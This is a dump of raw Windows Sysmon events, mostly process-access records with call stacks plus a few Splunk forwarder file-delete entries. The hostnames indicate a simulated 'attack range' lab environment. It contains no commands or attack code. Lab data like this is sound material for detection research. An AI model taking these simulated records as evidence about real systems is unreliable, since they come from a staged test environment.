12:30:02.598{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000046565Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.598{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000046564Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.598{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046563Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.598{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046562Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.598{FE4C2B44-DDF7-63C7-B204-00000000AF02}48483128C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d 10341000x800000000000000046561Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.598{FE4C2B44-DDF7-63C7-B204-00000000AF02}48483128C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e 10341000x800000000000000046560Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.598{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b9b44|C:\Windows\System32\TwinUI.dll+ba1f7|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000046559Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.598{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b9b44|C:\Windows\System32\TwinUI.dll+ba1f7|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000046558Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.582{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046557Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.582{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046556Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.582{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200500C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1088a6|C:\Windows\System32\TwinUI.dll+82197|C:\Windows\System32\TwinUI.dll+be23e|C:\Windows\System32\TwinUI.dll+be209|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046555Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.582{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200500C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1088a6|C:\Windows\System32\TwinUI.dll+82197|C:\Windows\System32\TwinUI.dll+be23e|C:\Windows\System32\TwinUI.dll+be209|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046554Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.582{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046553Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.582{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046552Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.582{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046551Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.567{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000046550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.348{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=43957FFB1CA0BD4C95260E8004E0D8CE,SHA256=ED5AFA72BA63A90E15A957D15076AF4AD5888F9444F7900369CCD0BC0667FF32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.191{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.191{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.191{FE4C2B44-DDF7-63C7-B204-00000000AF02}48483128C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07 23542300x800000000000000046546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:02.035{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1CF91B058D36A9BFDAAC63A3C095EBB,SHA256=901D31C5BA8BA35A2CF4EB5612211F082D0CD0D6DAE827F2EF2CCEA19A700363,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018708Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:03.567{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26555A58E375CBEE665A78270648079A,SHA256=33E57162B03841DECD4233F50FB8636BD2C4A2C28F699B4A4D9337547788E128,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046751Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.826{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046750Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.794{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046749Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.763{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000046748Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 